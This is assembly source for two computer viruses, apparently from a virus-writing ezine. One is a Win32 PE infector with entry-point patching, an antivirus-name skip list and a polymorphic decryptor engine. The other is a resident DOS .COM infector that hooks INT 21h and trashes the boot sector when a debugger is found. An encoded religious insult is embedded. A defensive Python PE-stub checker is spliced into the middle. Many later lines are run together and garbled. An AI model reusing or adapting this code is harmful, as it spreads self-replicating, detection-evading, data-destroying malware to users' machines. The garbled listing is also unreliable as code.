;--------------------------------------------------------------------------
; Patches the VxDCalls (on execute windows modifies them to a real call)
;--------------------------------------------------------------------------

VxDPatch:
        pushad
        mov bx, 020cdh                     ;int 20 used by VxDCall

        mov word ptr [VxD1-start+ebp], bx  ;int 20
        mov dword ptr [VxD1-start+ebp+2], VxD1V ;dd with IFSMGR & fn.

        mov word ptr [VxD2-start+ebp], bx
        mov dword ptr [VxD2-start+ebp+2], VxD2V

        mov word ptr [VxD3-start+ebp], bx
        mov dword ptr [VxD3-start+ebp+2], VxD3V

        mov word ptr [VxD4-start+ebp], bx
        mov dword ptr [VxD4-start+ebp+2], VxD4V

        mov word ptr [VxD5-start+ebp], bx
        mov dword ptr [VxD5-start+ebp+2], VxD5V

        mov word ptr [VxD6-start+ebp], bx
        mov dword ptr [VxD6-start+ebp+2], VxD6V

        mov word ptr [VxD7-start+ebp], bx
        mov dword ptr [VxD7-start+ebp+2], VxD7V

        popad
        ret

;--------------------------------------------------------------------------

rnd32_seed dd 0h

;------ this code is put at the EIP of the host and jmps to the virus code ------;
JmpToCode:

        stc
        db 066h, 0fh, 083h                 ;jnc

randombla dw ?                             ;some place

        mov eax, 12345678h
distance equ $-4

        push eax
        ret

EndJmpToCode:
;----------------------------------------------------------------------------;

;this sweet code will be appended to .com files (234 / 0EAh bytes large)
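The PE entry-point patch earlier in the listing (walk the section table, pick the section whose VirtualAddress..VirtualAddress+VirtualSize range contains AddressOfEntryPoint, convert with rva - VirtualAddress + PointerToRawData, then overwrite the bytes at that offset) and the JmpToCode stub above (stc, a never-taken jnc rel16 with a random displacement, mov eax,imm32 with the absolute target, push eax, ret: 13 bytes in all) can be checked from the defender's side with the same arithmetic. The Python below is an added example written for this page, not code from the listing or from IKX: it parses a PE32 header using the same field offsets the listing reads (PE+28h entry RVA, PE+34h ImageBase, section fields at +08h/+0Ch/+14h/+24h), performs the RVA lookup the way the look: loop does, and reports whether the bytes at the entry point match the stub layout and which section the stub's target lands in. The sample PE is constructed inline (one .text section, entry at RVA 1000h) and is not a real executable; the stub matcher keys on the fixed opcodes only, so it is a layout check rather than a full signature.

```python
import struct

STUB_LEN = 13  # stc(1) + 66 0F 83 rel16(5) + mov eax,imm32(5) + push eax(1) + ret(1)


def parse_pe(data: bytes):
    """Return (entry_rva, image_base, sections) for a PE32 image."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ header")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    oh_size = struct.unpack_from("<H", data, pe + 20)[0]
    entry_rva = struct.unpack_from("<I", data, pe + 0x28)[0]
    image_base = struct.unpack_from("<I", data, pe + 0x34)[0]
    first = pe + 24 + oh_size      # PE+18h plus SizeOfOptionalHeader, as the listing does
    sections = []
    for i in range(nsec):
        off = first + 40 * i
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append({"name": data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"),
                         "vsize": vsize, "va": va, "rawsize": rawsize,
                         "rawptr": rawptr, "chars": chars})
    return entry_rva, image_base, sections


def find_section(rva: int, sections):
    """Same test as the look: loop, (rva - VirtualAddress) < VirtualSize unsigned."""
    for s in sections:
        if 0 <= rva - s["va"] < s["vsize"]:
            return s
    return None  # the listing would walk past the section table here


def rva_to_offset(rva: int, sections):
    s = find_section(rva, sections)
    return None if s is None else rva - s["va"] + s["rawptr"]


def stub_at(data: bytes, off: int):
    """Match the JmpToCode layout F9 | 66 0F 83 ?? ?? | B8 imm32 | 50 | C3.
    Returns the imm32 (absolute jump target) or None."""
    s = data[off:off + STUB_LEN]
    if (len(s) == STUB_LEN and s[0] == 0xF9 and s[1:4] == b"\x66\x0F\x83"
            and s[6] == 0xB8 and s[11:13] == b"\x50\xC3"):
        return struct.unpack_from("<I", s, 7)[0]
    return None


def scan(data: bytes) -> dict:
    entry_rva, image_base, sections = parse_pe(data)
    off = rva_to_offset(entry_rva, sections)
    result = {"entry_offset": off, "stub_found": False,
              "target_rva": None, "target_section": None}
    if off is None:
        return result
    target = stub_at(data, off)
    if target is not None:
        sec = find_section(target - image_base, sections)
        result.update(stub_found=True, target_rva=target - image_base,
                      target_section=None if sec is None else sec["name"])
    return result


def build_sample(patched: bool) -> bytes:
    """Constructed minimal PE32 with one .text section; not a real executable."""
    image_base, entry_rva, pe_off, oh_size = 0x400000, 0x1000, 0x40, 0xE0
    hdr = bytearray(0x200)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, pe_off)
    hdr[pe_off:pe_off + 4] = b"PE\0\0"
    struct.pack_into("<H", hdr, pe_off + 6, 1)          # NumberOfSections
    struct.pack_into("<H", hdr, pe_off + 20, oh_size)   # SizeOfOptionalHeader
    struct.pack_into("<H", hdr, pe_off + 24, 0x10B)     # PE32 magic
    struct.pack_into("<I", hdr, pe_off + 0x28, entry_rva)
    struct.pack_into("<I", hdr, pe_off + 0x34, image_base)
    struct.pack_into("<I", hdr, pe_off + 0x3C, 0x200)   # FileAlignment
    s = pe_off + 24 + oh_size
    hdr[s:s + 8] = b".text\0\0\0"
    struct.pack_into("<IIII", hdr, s + 8, 0x1000, entry_rva, 0x200, 0x200)
    struct.pack_into("<I", hdr, s + 36, 0x60000020)
    body = bytearray(b"\xCC" * 0x200)                   # constructed host code (int3 filler)
    if patched:
        body[:STUB_LEN] = (b"\xF9\x66\x0F\x83\x12\x34\xB8"
                           + struct.pack("<I", image_base + 0x1100) + b"\x50\xC3")
    return bytes(hdr + body)


if __name__ == "__main__":
    for flag in (False, True):
        print(scan(build_sample(flag)))
```

Because the listing leaves AddressOfEntryPoint untouched and redirects through the stub instead, a check that only compares the entry RVA against the section table sees nothing unusual; reading the bytes at the resolved file offset is what makes the patch visible.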

dospayload label bytedb 0e8h , 09h , 00h , 0ebh , 012h , 08bh , 0ech , 083h , 0c4h , 020h , 0ebh , 04h , 0ebhdb 0fch , 0cdh , 021h , 0e8h , 02ch , 00h , 0ebh , 0eeh , 0e2h , 0f9h , 058h , 08bhdb 0ech , 02dh , 03h , 01h , 0fbh , 095h , 0b4h , 04ch , 080h , 0ech , 022h , 0cdh , 021hdb 080h , 0feh , 07h , 075h , 05h , 080h , 0fah , 07h , 074h , 017h , 0beh , 0eah , 01hdb 03h , 0f5h , 0bfh , 00h , 01h , 0a5h , 0a5h , 0b8h , 00h , 01h , 050h , 0c3h , 0ebhdb 05h , 0b8h , 00h , 04ch , 0cdh , 021h , 0c3h , 0beh , 058h , 01h , 03h , 0f5h , 08bhdb 0feh , 0b9h , 092h , 00h , 0fch , 0ach , 0f6h , 0d8h , 0aah , 0e2h , 0fah , 018hdb 07dh , 00h , 098h , 00h , 048h , 0f9h , 047h , 0f6h , 00h , 018h , 08dh , 00h , 042hdb 070h , 0ffh , 0fdh , 0bh , 018h , 0a8h , 00h , 018h , 0abh , 00h , 047h , 0d4h , 0ffhdb 018h , 09eh , 00h , 018h , 0b4h , 00h , 06h , 015h , 02h , 0a0h , 04ch , 0d4h , 033hdb 0dfh , 076h , 026h , 04ch , 0d4h , 033h , 0dfh , 0d6h , 02dh , 080h , 06h , 0echdb 08eh , 0bh , 09fh , 03dh , 0a9h , 09fh , 095h , 09bh , 0e0h , 08bh , 090h , 0d4hdb 0e0h , 0b2h , 09bh , 091h , 0d2h , 0d2h , 0d2h , 00h , 0ach , 098h , 09bh , 0e0hdb 0b3h , 09fh , 08ch , 08eh , 097h , 088h , 0e0h , 098h , 09fh , 08dh , 0e0h , 087hdb 091h , 08bh , 0d2h , 0d2h , 0d2h , 00h , 089h , 0c7h , 088h , 0d2h , 093h , 0bfhdb 0ach , 0aeh , 097h , 0a8h , 0e0h , 0adh , 0aah , 0a8h , 00h , 018h , 0eah , 00h , 0cdhdb 01h , 04ch , 0f6h , 054h , 055h , 018h , 055h , 01h , 0f6h , 040h , 08bh , 09h , 047hdb 0e2h , 00h , 018h , 05fh , 01h , 01eh , 05h , 03dh , 048h , 0fdh , 00h , 033h , 0f0hdb 04ch , 0ffh , 04bh , 0e0h , 033h , 0f0h , 03dh

first4bts dd ?                             ;the first 4 overwritten bytes from the host
dospayloadsize equ $-offset dospayload

badnames label byte
        db 04h, "_AVP"                     ;_AVP files
        db 03h, "NAV"                      ;Norton AV
        db 02h, "TB"                       ;Tbscan, Tbav32, whole shit
        db 02h, "F-"                       ;F-Prot
        db 03h, "PAV"                      ;Panda AV
        db 03h, "DRW"                      ;Doc. Web
        db 04h, "DSAV"                     ;Doc. Salomon
        db 03h, "NOD"                      ;NodIce
        db 03h, "SCA"                      ;SCAN
        db 05h, "NUKEN"                    ;Nukenabber? (error with infecting)
        db 04h, "YAPS"                     ;YetAnotherPortScanner (selfcheck)
        db 03h, "HL."                      ;HalfLife (thx to Ghostie!)
        db 04h, "MIRC"                     ;mIRC = strange
        db 0h

;--------------------------------------------------------------------------
; * Checks the name of the file to be infected
;--------------------------------------------------------------------------

checkname:                                 ;check for some bad names
        pushad

        mov ebp, edi                       ;delta
        mov edi, esi                       ;points to filename

        mov al, '.'
        cld
        scasb                              ;search from left to right for the dot
        jne $-1

        std
        mov al, '\'                        ;search from right to left for the \
        scasb
        jne $-1

        inc edi                            ;edi pointed to char before \
        inc edi                            ;edi pointed to \

        cld

        lea esi, [offset badnames+ebp-start]

checkname2:
        xor eax, eax                       ;for load AL
        lodsb                              ;size of string in al
        or al, al
        jz didit
        mov ecx, eax                       ;counter for bytes
        push edi                           ;save pointer to filename

        rep cmpsb                          ;compare stringbyte
        pop edi
        jz ArghItIsAshitFile
        add esi, ecx
        jmp checkname2

ArghItIsAshitFile:
        popad
        stc
        ret

didit:
        popad
        clc
        ret

;--------------------------------------------------------------------------

;--------------------------------------------------------------------------
; *** POLYMORPHIC engine which generates decrypter & encrypts code ***
;--------------------------------------------------------------------------

;
; The generated code will look like this:
;
;         pushad
;         lea  RegUsedAsPointer,[eax+placewherecryptedcodestarts]
;         mov  keyregister,randomvalue
;         sub  keyregister,randomvalue
;         mov  counterreg,size
; again:
;         mov  tempregister,[RegUsedAsPointer]
;         xor  tempregister,keyregister
;         mov  [RegUsedAsPointer],tempregister
;         add  RegUsedAsPointer,4
;         dec  counterreg
;         pushf
;         popf
;         jz   exit
;         jmp  again
; exit:
;
; between each instruction some random code is put.

polysz  equ offset polyend-offset encrypt
encrypt:

        push eax
        push ebx
        push edx
        push esi
        push edi

        lea edi, [offset viruscopy+ebp-start] ;edi points to buffer

        call gengarbage

;--------PUSHAD--
        mov al, 60h                        ;pushad
        stosb
;--------MOV-----

        call gengarbage

getregforoffset:                           ;This reg will contain the offset of code
        call getrndal
        cmp al, 4                          ;do not use ESP
        je getregforoffset
        cmp al, 5                          ;do not use EBP (!)
        je getregforoffset

        mov ch, al                         ;backup register for offset code

;--LEA reg,[EAX+x]-                        ;lea
        shl al, 3
        mov ah, 08dh
        xchg ah, al
        add ah, 080h
        push edi                           ;save location for patch
        stosw
        stosd                              ;doesn't matter what we store
;------------------

        call gengarbage

getregforkey:                              ;This reg will contain the crypt key
        call getrndal
        cmp al, 4                          ;do not use ESP
        je getregforkey
        cmp al, 1                          ;do not use ECX
        je getregforkey
        cmp al, ch
        je getregforkey

        mov cl, al                         ;backup register

        call gengarbage

;--------MOV-----
        add al, 0b8h                       ;make a MOV reg, rndvalue
        stosb
        call get_rnd32
        stosd
;----------------

        mov ebx, eax                       ;backup key
        mov ah, cl                         ;register back in ah

        call gengarbage

;--------SUB-----
        mov al, 081h                       ;make a SUB reg, rndvalue
        add ah, 0e8h
        stosw
        call get_rnd32
        stosd
;----------------

        sub ebx, eax                       ;Save the cryptkey

getregforsize:
        call getrndal
        cmp al, 4                          ;do not use ESP
        je getregforsize
        cmp al, cl                         ;nor keyreg
        je getregforsize
        cmp al, ch                         ;nor offsetreg
        je getregforsize

        mov dh, al

        call gengarbage

;----MOVSIZE-----                          ;mov ecx,virussize (size to decrypt)
        add al, 0b8h
        stosb
        mov eax, virusz/4
        stosd
;----------------

;*** AT THIS POINT IS EDI THE OFFSET FOR THE JMP ***

        mov esi, edi

;8b + 00, eax=3,[eax=0] ch = reg2

getregtoxor:                               ;This reg will contain crypted code and'll be xored
        call getrndal
        cmp al, 4                          ;do not use ESP
        je getregtoxor
        cmp al, cl
        je getregtoxor                     ;do not use the keyreg
        cmp al, ch
        je getregtoxor                     ;do not use the offset reg
        cmp al, dh
        je getregtoxor

        mov dl, al

        call gengarbage

;-MOV REG3,[REG2]                          ;make a mov reg3,[reg2] reg2=offset code
        shl al, 3
        or al, ch
        mov ah, 08bh
        xchg al, ah
        stosw
;----------------

        call gengarbage

;-XOR REG3,REG1--                          ;make a xor reg3,reg1 reg1=key
        mov al, dl
        shl al, 3
        or al, cl
        add al, 0c0h
        mov ah, 33h
        xchg al, ah
        stosw
;----------------

        call gengarbage

        mov al, dl

;-MOV [REG2],REG3                          ;make a mov [reg2],reg3 reg2=offset code
        shl al, 3
        or al, ch
        mov ah, 089h
        xchg al, ah
        stosw
;----------------

        call gengarbage

;-ADD REG2,4-----                          ;adds 4 to the offset register
        mov al, 83h
        stosb
        mov ax, 004c0h
        add al, ch
        stosw
;----------------

        call gengarbage

;---DEC REG4-----                          ;decreases counter reg4 (size)
        mov al, dh
        add al, 048h
        stosb
;----------------

        mov eax, 9c66h                     ;pushf
        stosw

        call gengarbage

        inc ah                             ;popf
        stosw

;---JZ OVER------
        mov ax, 074h
        stosw
        push edi
;----------------

        mov eax, edi                       ;can't generate > 80h-5 bytes of garbage
regenerate:                                ;between JZ beh - poly - JMP - beh: code...

        mov edi, eax                       ;restore EDI for ja

        call gengarbage

        mov edx, edi
        sub edx, eax
        cmp edx, 080h-5                    ;80h = max JZ distance, 5 is size of JMP BACK
        ja regenerate

;----JMP BACK----
        sub esi, edi
        mov al, 0e9h
        stosb
        mov eax, 0fffffffbh
        add eax, esi
        stosd
;----------------

;----PATCH JZ----
        pop esi                            ;esi-1 = jz value

        mov eax, edi
        sub eax, esi
        mov byte ptr [esi-1], al
;----------------

        call gengarbage

;----POPAD-------
        mov al, 61h                        ;popad
        stosb
;----------------

        call gengarbage

;----PATCH LEA---
        pop esi                            ;patch LEA reg1,[EAX+startofcrypted]
        push edi
        sub edi, offset viruscopy-start
        sub edi, ebp
        mov dword ptr [esi+2], edi
        pop edi
;----------------

        mov ecx, virusz/4                  ;copy encrypted virus code after poly
        mov esi, ebp                       ;decryptors

cryptit:
        lodsd
        xor eax, ebx
        stosd
        loop cryptit

        sub edi, offset viruscopy-start
        sub edi, ebp
        mov ecx, edi                       ;virus size + poly in ECX

        pop edi
        pop esi
        pop edx
        pop ebx
        pop eax
        ret

;----------------------------------------------------------------------------;
; Generates lot of rnd instructions which look good but do nothing
; (they undo themself indirect)
;----------------------------------------------------------------------------;

gengarbage:
        push eax
        push ebx
        push ecx
        push edx
        push esi

garbageloop:

        call get_rnd32

        and al, 1111b

        cmp al, 1
        je genadd                          ;OK

        cmp al, 2
        je gensub                          ;OK

        cmp al, 3
        je genxor                          ;OK

        cmp al, 4
        je genmov                          ;OK

        cmp al, 5
        je genpush                         ;OK

        cmp al, 6
        je geninc                          ;OK

        cmp al, 7
        je gendec                          ;OK

        cmp al, 8
        je gencmp                          ;OK

        cmp al, 9
        je genjunk                         ;OK

        cmp al, 0eh
        jb garbageloop

exitgen:

        pop esi
        pop edx
        pop ecx
        pop ebx
        pop eax

        ret

;----------------------------------------------------------------------------
; Generates random add
;----------------------------------------------------------------------------
genadd:

call getrndal

cmp al , 4je genadd ;4 = esp, leave him alone

cmp ah, 80hjb addandsub ;generate an add - code - sub

and eax , 111b

cmp byte ptr [ ebp+offset pushtable +eax - start ], 0h ;is the reg. pushed?ja savetoadd ;yep

call pushregister

call gengarbage

call randomadd ;adds a value or register

call gengarbage

call popregister

jmp exitgen

savetoadd :call randomadd

jmp exitgen

addandsub :push eax

xchg al , ahmov al , 081hadd ah, 0c0h

stoswpush eax

call get_rnd32stosdpush eax

call gengarbage

pop ebxpop eax

add ah, 028hstoswmov eax , ebxstosd

pop eaxjmp exitgen

;-------------------------------------------------- ---------------------------

;----------------------------------------------------------------------------
; Generates random sub
;----------------------------------------------------------------------------
gensub:

call getrndal

cmp al , 4je gensub ;4 = esp, leave him alone

cmp ah, 80hjb subandadd ;generate an add - code - sub

and eax , 111b

cmp byte ptr [ ebp+offset pushtable +eax - start ], 0h ;is the reg. pushed?ja savetosub ;yep

call pushregister

call gengarbage

call randomsub ;adds a value or register

call gengarbage

call popregister

jmp exitgen

savetosub :

call randomsub

jmp exitgen

subandadd :

push eax

xchg al , ahmov al , 081hadd ah, 0e8h

stoswpush eax

call get_rnd32stosdpush eax

call gengarbage

pop ebxpop eax

sub ah, 028hstoswmov eax , ebxstosd

pop eax

jmp exitgen
;----------------------------------------------------------------------------

;----------------------------------------------------------------------------
; Generates random xor
;----------------------------------------------------------------------------
genxor:

call getrndal

cmp al , 4je genxor

cmp ah, 80hjb genxorxor ;generate an xor - code - xor

and eax , 111b

cmp byte ptr [ ebp+offset pushtable +eax - start ], 0h ;is the reg. pushed?ja savetoxor ;yep

call pushregister ;first push

call gengarbage ;generate some garbage

call randomxor ;xors with a value or register

call gengarbage ;generate some garbage

call popregister ;and pop it

jmp exitgen

savetoxor :

call randomxor

jmp exitgen

genxorxor :push eax

xchg al , ahadd ah, 0f0h

mov al , 081h

stoswpush eax

call get_rnd32stosdpush eax

call gengarbage

pop ebxpop eax

stosw

mov eax , ebx

stosd

pop eaxjmp exitgen

;-------------------------------------------------- ---------------------------

;----------------------------------------------------------------------------
; Generates random mov
;----------------------------------------------------------------------------
genmov:

call getrndal

cmp al , 4je genmov

and eax , 111b ; eax <- al

cmp byte ptr [ ebp+offset pushtable +eax - start ], 0h ;is the reg. pushed?ja savetomov ;yep

call pushregister ;first push

call gengarbage ;generate some garbage

call randommov ;movs a value or register

call gengarbage ;generate some garbage

call popregister ;and pop it

jmp exitgen

savetomov :

call randommov

jmp exitgen
;----------------------------------------------------------------------------

;----------------------------------------------------------------------------
; Generates random push
;----------------------------------------------------------------------------
genpush:

call getrndal

cmp al , 4je genpush

and eax , 111b

call pushregister

call gengarbage

call popregister

jmp exitgen
;----------------------------------------------------------------------------

;----------------------------------------------------------------------------
; Generates random inc
;----------------------------------------------------------------------------
geninc:                                    ;40

call getrndalcmp al , 4je geninc

cmp ah, 80hja genincdec

and eax , 111b

cmp byte ptr [ ebp+offset pushtable +eax - start ], 0h ;is the reg. pushed?ja savetoinc

call pushregister

call gengarbage

add al , 040hstosb

call gengarbage

sub al , 040h

call popregister

jmp exitgen

savetoinc :add al , 040hstosbjmp exitgen

genincdec :add al , 40h ;incstosb

call gengarbage

add al , 8 ;decstosb

jmp exitgen

;-------------------------------------------------- ---------------------------

;----------------------------------------------------------------------------
; Generates random dec
;----------------------------------------------------------------------------
gendec:                                    ;48

call getrndalcmp al , 4je gendec

cmp ah, 80hja gendecinc

and eax , 111b

cmp byte ptr [ ebp+offset pushtable +eax - start ], 0h ;is the reg. pushed?ja savetodec

call pushregister

call gengarbage

add al , 048hstosb

call gengarbage

sub al , 048h

call popregister

jmp exitgen

savetodec :add al , 048hstosbjmp exitgen

gendecinc :add al , 48hstosb

call gengarbage

sub al , 8hstosbjmp exitgen

;-------------------------------------------------- ---------------------------

;----------------------------------------------------------------------------
; Pushes register in al
;----------------------------------------------------------------------------
pushregister:

push eax

inc byte ptr [ ebp+offset pushtable +eax - start ] ;set flag for reg.

add al , 050hstosb

pop eaxret

;-------------------------------------------------- ---------------------------

;----------------------------------------------------------------------------
; Pops register in al
;----------------------------------------------------------------------------
popregister:

push eax

dec byte ptr [ ebp+offset pushtable +eax - start ] ;unflag for reg.

add al , 058hstosb

pop eaxret

;-------------------------------------------------- ---------------------------

;----------------------------------------------------------------------------
; Generates random add reg,value or add reg1,reg2 - reg = al
;----------------------------------------------------------------------------
randomadd:

push eax

call get_rnd32

cmp al , 80hpop eaxpush eaxja addregreg

call randomaddvalue

rndaddb :pop eaxret

addregreg :call randomaddregjmp rndaddb

;-------------------------------------------------- ---------------------------

;----------------------------------------------------------------------------
; Generates random add reg,value - reg = al
;----------------------------------------------------------------------------

; 81 c0+reg value
; reg = eax 05 value

randomaddvalue :push eax

or al , al ;reg = eax?jz addeax ;special

xchg al , ahmov al , 081hadd ah, 0c0h

stosw

backfromaddeax :

call get_rnd32

stosd

pop eaxret

addeax :

mov al , 05hstosbjmp backfromaddeax

;-------------------------------------------------- ---------------------------

;----------------------------------------------------------------------------
; Generates random add reg1,reg2 - reg1 = al
;----------------------------------------------------------------------------
randomaddreg:

push eax

mov bl , al

call getrndal

shl bl , 3

or al , bl ;mix instructions

add al , 0c0hmov ah, 03hxchg ah, al

stosw

pop eaxret

;-------------------------------------------------- ---------------------------

;----------------------------------------------------------------------------
; Generates random sub reg,value or sub reg1,reg2 - reg = al
;----------------------------------------------------------------------------
randomsub:

push eax

call get_rnd32

cmp al , 80hpop eaxpush eaxja subregreg

call randomsubvalue

rndsubb :pop eaxret

subregreg :call randomsubreg

jmp rndsubb

;-------------------------------------------------- ---------------------------

;----------------------------------------------------------------------------
; Generates random sub reg,value - reg = al
;----------------------------------------------------------------------------

; 81 c0+reg value
; reg = eax 05 value

randomsubvalue :push eax

or al , al ;reg = eax?jz subeax ;special

xchg al , ahmov al , 081hadd ah, 0e8h

stosw

backfromsubeax :

call get_rnd32

stosd

pop eaxret

subeax :

mov al , 05hstosbjmp backfromsubeax

;-------------------------------------------------- ---------------------------

;----------------------------------------------------------------------------
; Generates random sub reg1,reg2 - reg1 = al
;----------------------------------------------------------------------------
randomsubreg:

push eax

mov bl , al

call getrndal

shl bl , 3

or al , bl ;mix instructions

add al , 0c0hmov ah, 03hxchg ah, al

stosw

pop eax

ret
;----------------------------------------------------------------------------

;----------------------------------------------------------------------------
; Generates a xor reg,value or xor reg,reg2 - reg = al
;----------------------------------------------------------------------------
randomxor:

push eaxcall get_rnd32cmp al , 80hpop eaxpush eaxja xorvalue

call randomxorreg

rndxorr :

pop eaxret

xorvalue :

call randomxorvaluejmp rndxorr

;-------------------------------------------------- ---------------------------

;----------------------------------------------------------------------------
; Generates a random xor reg,reg2 - reg = al
;----------------------------------------------------------------------------
randomxorreg:

push eax ;6633

mov bl , al

call getrndal

shl bl , 3

or al , bl ;mix instructions

add al , 0c0hmov ah, 033h

xchg ah, al

stosw

pop eaxret

;-------------------------------------------------- ---------------------------

;----------------------------------------------------------------------------
; Generates a random xor reg,value
;----------------------------------------------------------------------------
randomxorvalue:

push eax

add al , 0f0h

mov ah, 081h

xchg al , ah

stosw

call get_rnd32

stosd

pop eaxret

;-------------------------------------------------- ---------------------------

;----------------------------------------------------------------------------
; generates a random mov reg,value or reg,reg2
;----------------------------------------------------------------------------
randommov:

push eax

cmp ah, 080hjb movreg

call randommovvalue

movback :

pop eaxret

movreg :call randommovregjmp movback

;-------------------------------------------------- ---------------------------

;----------------------------------------------------------------------------
; Generates a random mov reg,value
;----------------------------------------------------------------------------
randommovvalue:

push eax

add al , 0b8h

stosb

call get_rnd32

stosd

pop eaxret

;----------------------------------------------------------------------------
; generates a random mov reg,reg2
;----------------------------------------------------------------------------
randommovreg:                              ;8b (c0+reg) or reg2

push eaxmov bl , al

call getrndal

shl bl , 3

or al , bl ;mix instructions

xchg ah, al

mov al , 08bhadd ah, 0c0h

stosw

pop eaxret

;----------------------------------------------------------------------------
; generates a random cmp reg,reg2 or cmp reg,value
;----------------------------------------------------------------------------
gencmp:                                    ;39/3b

call get_rnd32

cmp ah, 0c0hjb gencmp

cmp al , 80hja gencmpvalue

push eax

call get_rnd32mov bh, 039hcmp al , 80hja gencmp1add bh, 2

gencmp1:

pop eax

mov al , bh

cldstoswjmp exitgen

gencmpvalue : ;81f8

and eax , 0111badd ax , 081f8h

xchg al , ah

stosw

call get_rnd32

stosdjmp exitgen

;-------------------------------------------------- ---------------------------

;----------------------------------------------------------------------------
; Generate junk f8 - fd
;----------------------------------------------------------------------------
genjunk:

call get_rnd32cmp al , 0f8hjb genjunkcmp al , 0fdhja genjunk

stosb

jmp exitgen
;----------------------------------------------------------------------------

getrndal:
        call get_rnd32
        and al, 111b
        ret

rdtcs   equ <dw 310Fh>

get_rnd32:                                 ;main part by GriYo / 29A
        push ecx
        push ebx
        push edx
        push edi
        push esi

        mov eax, dword ptr [ebp+rnd32_seed-start]
        mov ecx, eax
        imul eax, 41C64E6Dh
        add eax, 00003039h
        mov dword ptr [ebp+rnd32_seed-start], eax

        xchg eax, ecx
        rdtcs                              ;just 4 some xtra randomness
        xchg eax, ecx
        xor eax, ecx

        pop esi
        pop edi
        pop edx
        pop ebx
        pop ecx
        ret

polyend:

        db "(c)"                           ;just some junk

end:

;----------------------------------------------------------------------------;

pointertope dd ?

if debug eq 1
death       dd ?                           ;kill ourself flag
endif

busy        dd ?
filename    db 100h dup (0h)
peheader    db 1024 dup (0h)
whereappend dd ?
pushtable   db 8 dup (0h)

viruscopy   db (virusz+1000) dup (0h)      ;virussize + poly

memend:

_CODE ends

;----------------------------------------------------------------------------;

;----------------------------------------------------------------------------;
_DATA   segment dword use32 public 'DATA'
fill    db ?
_DATA   ends
_burp   segment dword use32 public 'LiFEwiRE'
fill2   db ?
_burp   ends
;----------------------------------------------------------------------------;

        end start
end

; Resident .COM midfile infector - 666 bytes - 02/2000 by T-2000/IR.
; Uses the INT 21h ISR to locate a suitable place to put the CALL_Virus.

.286

.MODEL TINY

.CODE

Virus_Size      EQU (End_Body-START)
Virus_Size_Mem  EQU (((End_Heap-START)+15)/16)

START:          PUSHF                      ; Save registers.
                PUSHA
                PUSH DS
                PUSH ES

                CALL Get_IP

; Encrypted with XOR 66h:
; "If Jesus was fucked to death, all xtians would be wearing tiny dildo's"
; (pardon my sense of humour :)

Message         DB 6Bh, 6Ch, 2Fh, 00h, 46h, 2Ch, 03h
                DB 15h, 13h, 15h, 46h, 11h, 07h, 15h
                DB 46h, 00h, 13h, 05h, 0Dh, 03h, 02h
                DB 46h, 12h, 09h, 46h, 02h, 03h, 07h
                DB 12h, 0Eh, 4Ah, 46h, 07h, 0Ah, 0Ah
                DB 46h, 1Eh, 12h, 0Fh, 07h, 08h, 15h
                DB 46h, 11h, 09h, 13h, 0Ah, 02h, 46h
                DB 04h, 03h, 46h, 11h, 03h, 07h, 14h
                DB 0Fh, 08h, 01h, 46h, 12h, 0Fh, 08h
                DB 1Fh, 46h, 02h, 0Fh, 0Ah, 02h, 09h
                DB 41h, 15h, 6Bh, 6Ch, 61h, 66h

Get_IP:         POP SI                     ; Calculate delta offset.
                SUB SI, (Message-START)

                MOV AH, 30h                ; Get DOS version.
                INT 21h

                CMP AL, 4                  ; We need DOS 4.xx or above.
                JB Restore_Host

                MOV AX, 2000h              ; Virus residency check.
                INT 21h

                XCHG CX, AX                ; Already up there?
                JCXZ Restore_Host          ; Then abort further install.

                MOV AH, 43h                ; Soft-Ice residency check.
                INT 68h

                CMP AX, 0F386h             ; Active?
                JZ Trash_Boot

; (This works in Win32 as well, though you have to encapsulate it
; with a SEH as the INT 68h will GPF if Soft-Ice ain't loaded).

Alloc_Memory:   XOR CX, CX

Alloc_Block:    MOV AH, 48h                ; Attempt to allocate memory.
                MOV BX, Virus_Size_Mem
                INT 21h

Page 114: EZine - Coderz #1

                JNC Init_Block

                DEC CX                  ; CX = -1
                JNP Restore_Host        ; Endless loop?

                MOV AH, 4Ah             ; Get blocksize of ES.
                MOV BX, CX
                INT 21h

                MOV AH, 4Ah             ; Create room for the virus.
                SUB BX, Virus_Size_Mem + 1
                INT 21h
                JNC Alloc_Block

                JMP Restore_Host        ; And attempt allocation.

Init_Block:     MOV ES, AX              ; ES = allocated block.

                DEC AX                  ; DS = MCB allocated block.
                MOV DS, AX

                XOR DI, DI

                MOV WORD PTR DS:[DI+1], 8 ; Disguise block as system.

                MOV CX, (Virus_Size / 2) ; Copy viruscode up there.
                SEGCS
                REP MOVSW

                PUSH ES

                MOV AX, 3521h           ; Get INT 21h.
                INT 21h

                PUSH ES
                POP DS

                MOV AX, 2566h           ; Revector it to INT 66h.
                MOV DX, BX
                INT 21h

                POP DS

                MOV Busy_Switch, CL     ; Clear busy flag.

                MOV AL, 21h             ; Hook INT 21h.
                MOV DX, OFFSET New_Int21h
                INT 21h

Restore_Host:   PUSH SS                 ; So we can STOS to SS.
                POP ES

                MOV BP, SP              ; Setup stack pointer.

                MOV DI, [BP+(11*2)]     ; CALL_Virus return address.

                SUB DI, 3               ; Offset of CALL_Virus.

                MOV [BP+(11*2)], DI     ; Re-execute it later.

                MOV AL, NOT 0C3h        ; Encrypted original byte.
Host_Byte       = BYTE PTR $-1

                NOT AL                  ; Decrypt byte.


                STOSB                   ; Restore byte in memory.

                MOV AX, 9090h - 1       ; Encrypted original word.
Host_Word       = WORD PTR $-2

                INC AX                  ; Decrypt word.
                STOSW                   ; Restore word in memory.

                POP ES                  ; Restore original registers.
                POP DS
                POPA
                POPF

                RETN                    ; And re-execute, fixed code.

Trash_Boot:     MOV AL, 2               ; Trash the bootsector of C:.
                MOV CX, 1
                XOR DX, DX
                SEGCS                   ; Stupid anti-TBClean trick.
                INT 26h

                INT 19h                 ; Reboot the system.

New_Int21h:     CMP AX, 2000h           ; Virus residency call.
                JNE Check_Exit

                CBW                     ; AX = 0.

                IRET                    ; And return.

Check_Exit:     PUSHA                   ; Save all regs.
                PUSH DS
                PUSH ES

                OR AH, AH               ; Program terminate?
                JZ Check_Timer

                CMP AH, 4Ch             ; Program terminate?
                JNE Check_Debugger

